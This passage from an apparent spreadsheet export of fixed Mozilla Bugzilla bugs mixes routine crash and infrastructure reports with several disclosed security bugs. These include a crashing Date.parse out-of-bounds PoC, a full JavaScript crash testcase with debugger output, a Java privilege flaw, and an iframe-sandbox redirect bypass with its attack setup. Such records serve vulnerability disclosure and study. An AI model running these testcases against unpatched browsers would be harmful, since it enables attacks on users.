          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1450" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1450" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1450" t="inlineStr"/>
      <c r="Q1450" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1450" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1450" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1450" t="n">
        <v>1</v>
      </c>
      <c r="U1450" t="n">
        <v>0</v>
      </c>
      <c r="V1450" t="n">
        <v>4</v>
      </c>
      <c r="W1450" t="inlineStr">
        <is>
          <t>Bitbar has never used taskcluster-proxy, but it is required and/or helpful to have for accessing secrets.
Steps per :tomprince:
1. add taskcluster-proxy binary to the path
2. set a port that doesn't conflict with the existing proxies used by tests (non-80?)
3. remove the workaround tomprince put in place during TCW to deal with taskcluster-proxy failures</t>
        </is>
      </c>
      <c r="X1450" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" t="n">
        <v>1491778</v>
      </c>
      <c r="B1451" t="inlineStr">
        <is>
          <t>2018-09-17 03:35:09 -0700</t>
        </is>
      </c>
      <c r="C1451" t="inlineStr">
        <is>
          <t>Crash report has invalid JSON in the telemetry environment</t>
        </is>
      </c>
      <c r="D1451" t="inlineStr">
        <is>
          <t>2020-03-26 07:48:01 -0700</t>
        </is>
      </c>
      <c r="E1451" t="n">
        <v>1</v>
      </c>
      <c r="F1451" t="n">
        <v>1</v>
      </c>
      <c r="G1451" t="n">
        <v>4</v>
      </c>
      <c r="H1451" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1451" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1451" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1451" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1451" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1451" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1451" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1451" t="inlineStr"/>
      <c r="Q1451" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1451" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1451" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1451" t="n">
        <v>1</v>
      </c>
      <c r="U1451" t="n">
        <v>0</v>
      </c>
      <c r="V1451" t="n">
        <v>16</v>
      </c>
      <c r="W1451" t="inlineStr">
        <is>
          <t>If you go to the telemetry environment tab on https://crash-stats.mozilla.com/report/index/9f215422-98ef-436e-9622-b1c210180915#tab-telemetryenvironment it says the JSON is invalid. I haven't checked the raw dump to see what's actually happening.</t>
        </is>
      </c>
      <c r="X1451" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" t="n">
        <v>1634738</v>
      </c>
      <c r="B1452" t="inlineStr">
        <is>
          <t>2020-05-01 11:20:44 -0700</t>
        </is>
      </c>
      <c r="C1452" t="inlineStr">
        <is>
          <t>1 byte OOB read in Date.parse</t>
        </is>
      </c>
      <c r="D1452" t="inlineStr">
        <is>
          <t>2020-07-21 12:35:24 -0700</t>
        </is>
      </c>
      <c r="E1452" t="n">
        <v>1</v>
      </c>
      <c r="F1452" t="n">
        <v>1</v>
      </c>
      <c r="G1452" t="n">
        <v>3</v>
      </c>
      <c r="H1452" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1452" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1452" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1452" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main78+]</t>
        </is>
      </c>
      <c r="Q1452" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1452" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1452" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T1452" t="n">
        <v>1</v>
      </c>
      <c r="U1452" t="n">
        <v>0</v>
      </c>
      <c r="V1452" t="n">
        <v>37</v>
      </c>
      <c r="W1452" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Steps to reproduce:
I found a 1-byte OOB bug in the implementation of Date.parse in Spidermonkey.
When calling `Date.parse` in JavaScript, Spidermonkey will convert the input object to a `JSLinearString` where the string is represented inside a contiguous buffer and the core implementation will iterate over the string to parse it. This is implemented in `ParseDate&lt;unsigned char&gt;` in `gecko-dev/js/src/jsdate.cpp:1093`. 
The implementation consists of a big while loop guarded by a `i &lt; length` check where i is the current index inside the string buffer. However the implementation is buggy and can lead to a 1-byte OOB read under specific circumstances
The core of the loop looks like the following:
```
	   while (i &lt; length) {
	     int c = s[i];
	     i++; [[ 1 ]]
	     if (c &lt;= ' ' || c == ',' || c == '-') {
	       if (c == '-' &amp;&amp; '0' &lt;= s[i] &amp;&amp; s[i] &lt;= '9') { [[ 2 ]]
	         prevc = c;
	       }
```
At [[ 1 ]], the index is incremented and based on what the value of the currently read character is, the code will try to look-up the next character to determine what it is parsing. However it does not check in the particular code-path where c is '-' that i has not become greater than length therefore [[ 2 ]] will read 1-byte OOB of the string buffer.
The simplest PoC that highlights the issue is the following code:
```
s = "-".repeat(0x100000);
Date.parse(s);
```
Running this inside the shell should instantly crash the process with a SIGSEGV.
As far as security impact, I think this should be classified as low impact as at best it could potentially maybe be used as an OOB 1-byte oracle.
(While getting a bit ahead, if this is considered for a potential bounty, I want to point out that I have previously received bounty payments from Mozilla but that information is now outdated and not valid anymore as I operate under my own company now)
Actual results:
The process crashed by reading OOB at an unmapped memory address
Expected results:
Nothing should happen, the code for Date.parse should handle that case gracefully</t>
        </is>
      </c>
      <c r="X1452" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" t="n">
        <v>1159973</v>
      </c>
      <c r="B1453" t="inlineStr">
        <is>
          <t>2015-04-29 17:03:06 -0700</t>
        </is>
      </c>
      <c r="C1453" t="inlineStr">
        <is>
          <t>crash in js::frontend::Parser&lt;js::frontend::SyntaxParseHandler&gt;::unaryExpr(js::frontend::Parser&lt;js::frontend::SyntaxParseHandler&gt;::InvokedPrediction)</t>
        </is>
      </c>
      <c r="D1453" t="inlineStr">
        <is>
          <t>2016-07-02 10:45:01 -0700</t>
        </is>
      </c>
      <c r="E1453" t="n">
        <v>1</v>
      </c>
      <c r="F1453" t="n">
        <v>1</v>
      </c>
      <c r="G1453" t="n">
        <v>3</v>
      </c>
      <c r="H1453" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1453" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1453" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1453" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L1453" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1453" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1453" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q1453" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1453" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1453" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1453" t="n">
        <v>1</v>
      </c>
      <c r="U1453" t="n">
        <v>0</v>
      </c>
      <c r="V1453" t="n">
        <v>58</v>
      </c>
      <c r="W1453" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-228e68c8-0202-48c2-b763-7ddd72150423.
=============================================================
New signature in 38/39/40, first report in build 2015022400.
Reported crashes over the past 28 days:
Product	Version	Percentage	Number Of Crashes
Firefox 	38.0b6 	26.81 %	740
Firefox 	38.0b1 	16.30 %	450
Firefox 	38.0b5 	15.62 %	431
Firefox 	38.0b4 	14.64 %	404
Firefox 	38.0b3 	13.55 %	374
Firefox 	38.0b2 	7.14 %	197
Firefox 	39.0a2 	4.24 %	117
Firefox 	40.0a1 	1.16 %	32
Firefox 	38.0a2 	0.43 %	12
Firefox 	38.0b8 	0.04 %	1
Firefox 	39.0a1 	0.04 %	1
FennecAndroid 	38.0b4 	0.04 %	1</t>
        </is>
      </c>
      <c r="X1453" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" t="n">
        <v>1357287</v>
      </c>
      <c r="B1454" t="inlineStr">
        <is>
          <t>2017-04-17 20:52:08 -0700</t>
        </is>
      </c>
      <c r="C1454" t="inlineStr">
        <is>
          <t>Crash in java.lang.RuntimeException: cannot get MediaCodecList at android.media.MediaCodecList.native_getCodecCount(Native Method)</t>
        </is>
      </c>
      <c r="D1454" t="inlineStr">
        <is>
          <t>2023-07-21 16:52:21 -0700</t>
        </is>
      </c>
      <c r="E1454" t="n">
        <v>1</v>
      </c>
      <c r="F1454" t="n">
        <v>1</v>
      </c>
      <c r="G1454" t="n">
        <v>6</v>
      </c>
      <c r="H1454" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1454" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1454" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1454" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1454" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1454" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1454" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1454" t="inlineStr"/>
      <c r="Q1454" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1454" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1454" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T1454" t="n">
        <v>1</v>
      </c>
      <c r="U1454" t="n">
        <v>0</v>
      </c>
      <c r="V1454" t="n">
        <v>11</v>
      </c>
      <c r="W1454" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-523303de-52cb-4c5e-8768-20b442170415.
=============================================================
Longstanding crash:
&gt; product      version count perc  installations
&gt; FennecAndroid 52.0.2 	366  83.9%  108
&gt; FennecAndroid 53.0 	 27   6.2%    5
&gt; FennecAndroid 53.0b11  27   6.2%    8
&gt; FennecAndroid 54.0a2 	 11   2.5%    6
&gt; FennecAndroid 53.0b9 	  5   1.1%    1
Java stack trace:
&gt; java.lang.RuntimeException: cannot get MediaCodecList
&gt;   at android.media.MediaCodecList.native_getCodecCount(Native Method)
&gt;   at android.media.MediaCodecList.initCodecList(MediaCodecList.java:82)
&gt;   at android.media.MediaCodecList.getCodecCount(MediaCodecList.java:43)
&gt;   at org.mozilla.gecko.util.HardwareCodecCapabilityUtils.findDecoderCodecInfoForMimeType(HardwareCodecCapabilityUtils.java:43)
&gt;   at org.mozilla.gecko.mozglue.GeckoLoader.nativeRun(Native Method)
&gt;   at org.mozilla.gecko.GeckoThread.run(GeckoThread.java:583)
jchen, any ideas?</t>
        </is>
      </c>
      <c r="X1454" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" t="n">
        <v>817219</v>
      </c>
      <c r="B1455" t="inlineStr">
        <is>
          <t>2012-11-30 17:59:27 -0800</t>
        </is>
      </c>
      <c r="C1455" t="inlineStr">
        <is>
          <t>Crash @xul!nsDOMEvent::GetTargetFromFrame on poison value</t>
        </is>
      </c>
      <c r="D1455" t="inlineStr">
        <is>
          <t>2014-11-03 04:05:54 -0800</t>
        </is>
      </c>
      <c r="E1455" t="n">
        <v>1</v>
      </c>
      <c r="F1455" t="n">
        <v>1</v>
      </c>
      <c r="G1455" t="n">
        <v>3</v>
      </c>
      <c r="H1455" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1455" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1455" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1455" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1455" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1455" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1455" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1455" t="inlineStr">
        <is>
          <t>[fixed by bug 635852][adv-main22+]</t>
        </is>
      </c>
      <c r="Q1455" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1455" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1455" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T1455" t="n">
        <v>1</v>
      </c>
      <c r="U1455" t="n">
        <v>0</v>
      </c>
      <c r="V1455" t="n">
        <v>6</v>
      </c>
      <c r="W1455" t="inlineStr">
        <is>
          <t>Created attachment 687339
crash.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20.0 Firefox/20.0
Build ID: 20121126030823
Steps to reproduce:
Description:
The attached testcase crashes the browser, which seems to be related to event handling with frames. Crashes on a poison value, which indicates a potentially exploitable behaviour.
Tested and Affected Versions:
Firefox 20.0a1 (trunk)
Firefox 17.0
Testcase:
crash.html:
&lt;html&gt;
&lt;script src="crash.js"&gt;&lt;/script&gt;
&lt;script&gt;
window.setTimeout("start();", 10);
&lt;/script&gt;
&lt;body&gt;  
&lt;/body&gt; 
&lt;/html&gt;
crash.js:
function start() {
o3=document.createElement('input');
tmp = o3.ownerDocument.createElement('iframe');
document.body.appendChild(tmp);
o4=tmp.contentDocument;
cb_3=function() { var f = callback_3; callback_3 = null; return f(arguments); }
o3.addEventListener('change', cb_3, false);
o51=document.createElement('img');
o94=document.createElement('input');
o94.type='checkbox';
o3.appendChild(o94);
o192=document.createElement('input');
o192.type='button';
o94.appendChild(o192);
o263=document.createEvent('MouseEvents');
o263.initMouseEvent('click', true, true, window,0, 0, 0, 0, 0, false, false, false, false, 0, null);
o192.dispatchEvent(o263)
}
function callback_3() {
o192.addEventListener('DOMNodeRemoved', callback_21, true);
o51.appendChild(o192);
}
function callback_21() {
o4.documentElement.appendChild(o192);
location.reload();
}
When trying to include the Javascript code into the HTML it doesn't seem to be crashing on Windows. Both files are attached.
Crash log on Linux:
Program received signal SIGSEGV, Segmentation fault.
0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
(gdb) info reg
eax            0x0	0
ecx            0xffffff80	-128
edx            0xf35017ff	-212854785
ebx            0xf767adf8	-144200200
esp            0xfff7f150	0xfff7f150
ebp            0xfff7f168	0xfff7f168
esi            0xe17de3fc	-511843332
edi            0xe775be68	-411713944
eip            0xf68ba5a4	0xf68ba5a4 &lt;nsWeakFrame::InitInternal(nsIFrame*)+52&gt;
eflags         0x210282	[ SF IF RF ID ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99
(gdb) x/3i $eip
=&gt; 0xf68ba5a4 &lt;_ZN11nsWeakFrame12InitInternalEP8nsIFrame+52&gt;:	mov    0x1c(%edx),%eax
   0xf68ba5a7 &lt;_ZN11nsWeakFrame12InitInternalEP8nsIFrame+55&gt;:	mov    (%eax),%edi
   0xf68ba5a9 &lt;_ZN11nsWeakFrame12InitInternalEP8nsIFrame+57&gt;:	mov    0xc(%edi),%eax
(gdb) bt 20
#0  0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
#1  0xf6a07017 in nsEventStateManager::GetEventTarget() () from /home/fred/debugging/firefox/libxul.so
#2  0xf6a0d830 in nsDOMEvent::GetTargetFromFrame() () from /home/fred/debugging/firefox/libxul.so
#3  0xf6a0d8da in nsDOMEvent::InitPresContextData(nsPresContext*) () from /home/fred/debugging/firefox/libxul.so
#4  0xf6a1595c in nsDOMBeforeUnloadEvent::nsDOMBeforeUnloadEvent(nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#5  0xf6a159e2 in NS_NewDOMBeforeUnloadEvent(nsIDOMEvent**, nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#6  0xf69a1c5e in nsDocument::CreateEvent(nsAString_internal const&amp;, nsIDOMEvent**) () from /home/fred/debugging/firefox/libxul.so
#7  0xf686f0b2 in nsDocumentViewer::PermitUnload(bool, bool*) () from /home/fred/debugging/firefox/libxul.so
#8  0xf6d337da in nsDocShell::InternalLoad(nsIURI*, nsIURI*, nsISupports*, unsigned int, unsigned short const*, char const*, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsIDocShell**, nsIRequest**) () from /home/fred/debugging/firefox/libxul.so
#9  0xf5f8377f in nsDocShell::LoadHistoryEntry(nsISHEntry*, unsigned int) () from /home/fred/debugging/firefox/libxul.so
#10 0xf6d27b2b in nsDocShell::Reload(unsigned int) () from /home/fred/debugging/firefox/libxul.so
#11 0xf5d90fea in nsLocation::Reload(bool) () from /home/fred/debugging/firefox/libxul.so
#12 0xf6eda590 in NS_InvokeByIndex_P () from /home/fred/debugging/firefox/libxul.so
#13 0xf6cecc6a in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) () from /home/fred/debugging/firefox/libxul.so
#14 0xf6cf37ac in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) () from /home/fred/debugging/firefox/libxul.so
#15 0xf709f156 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) () from /home/fred/debugging/firefox/libxul.so
#16 0xf709321a in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) () from /home/fred/debugging/firefox/libxul.so
#17 0xf7153545 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) () from /home/fred/debugging/firefox/libxul.so
#18 0xf7153649 in js::mjit::JaegerShot(JSContext*, bool) () from /home/fred/debugging/firefox/libxul.so
#19 0xf709ea30 in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) () from /home/fred/debugging/firefox/libxul.so
Crash log on Windows:
xul!nsDOMEvent::GetTargetFromFrame+0x137d3e
xul!nsDOMEvent::nsDOMEvent+0xbc
xul!NS_NewDOMBeforeUnloadEvent+0x1d
xul!nsEventDispatcher::CreateEvent+0x36f
xul!nsHTMLDocument::CreateEvent+0x38
xul!DocumentViewerImpl::PermitUnload+0xbb
xul!nsDocShell::InternalLoad+0x5f8
xul!nsDocShell::LoadHistoryEntry+0x256
xul!nsDocShell::Reload+0xd6
xul!nsLocation::Reload+0x39
xul!NS_InvokeByIndex_P+0x27
xul!XPCWrappedNative::CallMethod+0x319
xul!XPC_WN_CallMethod+0xaa
mozjs!js::InvokeKernel+0x59
mozjs!js::Interpret+0x6ce4
mozjs!js::RunScript+0x415
mozjs!js::InvokeKernel+0x250
mozjs!js::Invoke+0x128
mozjs!JS_CallFunctionValue+0x41
xul!nsXPCWrappedJSClass::CallMethod+0x488
xul!nsDOMEvent::GetTargetFromFrame+0x137d3e:
6ff5b80e 8b511c          mov     edx,dword ptr [ecx+1Ch] ds:002b:f0de801b=????????
reported by nils of vulndev ltd.</t>
        </is>
      </c>
      <c r="X1455" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" t="n">
        <v>611897</v>
      </c>
      <c r="B1456" t="inlineStr">
        <is>
          <t>2010-11-12 16:57:38 -0800</t>
        </is>
      </c>
      <c r="C1456" t="inlineStr">
        <is>
          <t>Only pass URL schemes to the OJI plugin that Java can understand</t>
        </is>
      </c>
      <c r="D1456" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1456" t="n">
        <v>1</v>
      </c>
      <c r="F1456" t="n">
        <v>1</v>
      </c>
      <c r="G1456" t="n">
        <v>6</v>
      </c>
      <c r="H1456" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1456" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1456" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1456" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1456" t="inlineStr">
        <is>
          <t>[sg:high] (goes with bug 611910)</t>
        </is>
      </c>
      <c r="Q1456" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1456" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1456" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1456" t="n">
        <v>1</v>
      </c>
      <c r="U1456" t="n">
        <v>0</v>
      </c>
      <c r="V1456" t="n">
        <v>40</v>
      </c>
      <c r="W1456" t="inlineStr">
        <is>
          <t>This bug was spun off from bug 589041, to fix that bug for OJI
plugins.
OJI uses the current script principal's origin to configure the
privileges of Java code that's called (via the nsISecureEnv interface)
from JavaScript code (aka JavaScript-to-Java LiveConnect).
As the testcase from bug 589041 shows, if the script principal's
origin is a malformed URL (or one that Java can't understand),
JavaScript-to-Java calls will run with abnormally high privileges:
Specifically, it will be allowed to read any file.
This happens in the following method in SecureInvocation.java (part of
the source distro for Sun/Oracle JDKs going back to Java 1.4.2):
private static ProtectionDomain
  getDefaultProtectionDomain(String urlString, boolean direct)
This method tries to construct a URL object from the urlString
parameter, using the URL(String) constructor.  If the constructor
fails with a MalformedURLException, the 'url' variable gets set to
'null'.  Then if 'url' is 'null' or its scheme/protocol is 'file', the
following permission is added to the PermissionCollection object from
which a ProtectionDomain will be created:
FilePermission("&lt;&lt;ALL FILES&gt;&gt;", "read")
The 'urlString' value passed to getDefaultProtectionDomain()
ultimately comes from a call to nsCSecurityContext::GetOrigin() in
Mozilla OJI code.
In my next comment I'll post a patch that changes this method to only
return an 'origin' that Java will understand -- that won't cause the
URL(String) constructor to throw a MalformedURLException.</t>
        </is>
      </c>
      <c r="X1456" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" t="n">
        <v>1677138</v>
      </c>
      <c r="B1457" t="inlineStr">
        <is>
          <t>2020-11-13 08:00:12 -0800</t>
        </is>
      </c>
      <c r="C1457" t="inlineStr">
        <is>
          <t>sandboxed iframes can "redirect" to external schemes</t>
        </is>
      </c>
      <c r="D1457" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:32 -0800</t>
        </is>
      </c>
      <c r="E1457" t="n">
        <v>1</v>
      </c>
      <c r="F1457" t="n">
        <v>1</v>
      </c>
      <c r="G1457" t="n">
        <v>3</v>
      </c>
      <c r="H1457" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1457" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1457" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1457" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1457" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1457" t="inlineStr">
        <is>
          <t>[Fixed by Bug 1766828][post-critsmash-triage][adv-main102+]</t>
        </is>
      </c>
      <c r="Q1457" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1457" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1457" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T1457" t="n">
        <v>1</v>
      </c>
      <c r="U1457" t="n">
        <v>0</v>
      </c>
      <c r="V1457" t="n">
        <v>33</v>
      </c>
      <c r="W1457" t="inlineStr">
        <is>
          <t>Created attachment 9187695
ad.html
This was sent into the security list:
We’ve recently discovered a malicious ad campaign that is taking advantage of iFrames to attempt to redirect the user to a different app. When the ad is served in an iFrame in the publisher page and ad server sends a redirect header, we have observed that Firefox in macOS and Android does not actually ignore these redirect attempts but asks the user the permission to redirect to the app even when the iFrame is appropriately sandboxed with allow-top-navigation-by-user-activation. We have so far tested this with the schemes listed below as the value of the "Location" parameter for the header:
MacOS Schemes
- "itms-apps://",
- "itms-appss://",
- "itms://",
- "itmss://",
- "https://itunes.apple.com/app/",
- "ibooks://",
- "itms-books://",
- "itms-bookss://",
- "contact://",
- "message://",
- "sms://",
- "music://",
- "musics://",
- "podcasts://",
- "itms-podcasts://",
- "podcast://",
- "tel://"
Android Schemes
- "Intent://"
For example, when the "Location" value of the header is "itms-apps://itunes.apple.com/app/id378458261", Firefox attempted to open the app with id id378458261 in AppStore in MacOS. When the "Location" value of the header is "intent://#Intent;package=com.vtaxi.app;S.market_referrer=appmetrica_tracking_id%253D602904027453287968%2526ym_tracking_id%253D9847664011024495609;end", Firefox redirected to the Google Play page of that app.
I have produced a working POC with Firefox 78.4.0esr (64-bit) on my macOs 10.15.7 and with Firefox 82.1.3 (Build #2015774645) on Pixel 4 with Android 11.
I have also attached the proof of concept code that performs the attack. I have produced a working POC using the setup I described below:
1. Run malicious-ad-server.py with python3 to serve ad.html in an iFrame using ngrok on port 8000.
2. Run publisher.py with python3 to serve PUBLISHER-DOMAIN/safe and PUBLISHER-DOMAIN/unsafe paths using ngrok, on a different machine than the malicious server. (You also need to change "src" value of the iFrames in publisher.py to "MALICIOUS-SERVER-DOMAIN/ad.html"). PUBLISHER-DOMAIN/unsafe serves the ad in an iFrame without sandbox attributes whereas PUBLISHER-DOMAIN/safe serves the ad in a sandboxed iframe with attributes:
- "allow-top-navigation-by-user-activation"
- "allow-forms"
- "allow-pointer-lock"
- "allow-popups"
- "allow-popups-to-escape-sandbox"
- "allow-same-origin"
- "allow-scripts"
3. Using a 3rd device, visit publisher site's /safe and /unsafe pages.</t>
        </is>
      </c>
      <c r="X1457" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" t="n">
        <v>180005</v>
      </c>
      <c r="B1458" t="inlineStr">
        <is>
          <t>2002-11-13 14:44:17 -0800</t>
        </is>
      </c>
      <c r="C1458" t="inlineStr">
        <is>
          <t>Updates to Bugzilla FAQ</t>
        </is>
      </c>
      <c r="D1458" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E1458" t="n">
        <v>1</v>
      </c>
      <c r="F1458" t="n">
        <v>1</v>
      </c>
      <c r="G1458" t="n">
        <v>4</v>
      </c>
      <c r="H1458" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1458" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1458" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K1458" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L1458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1458" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
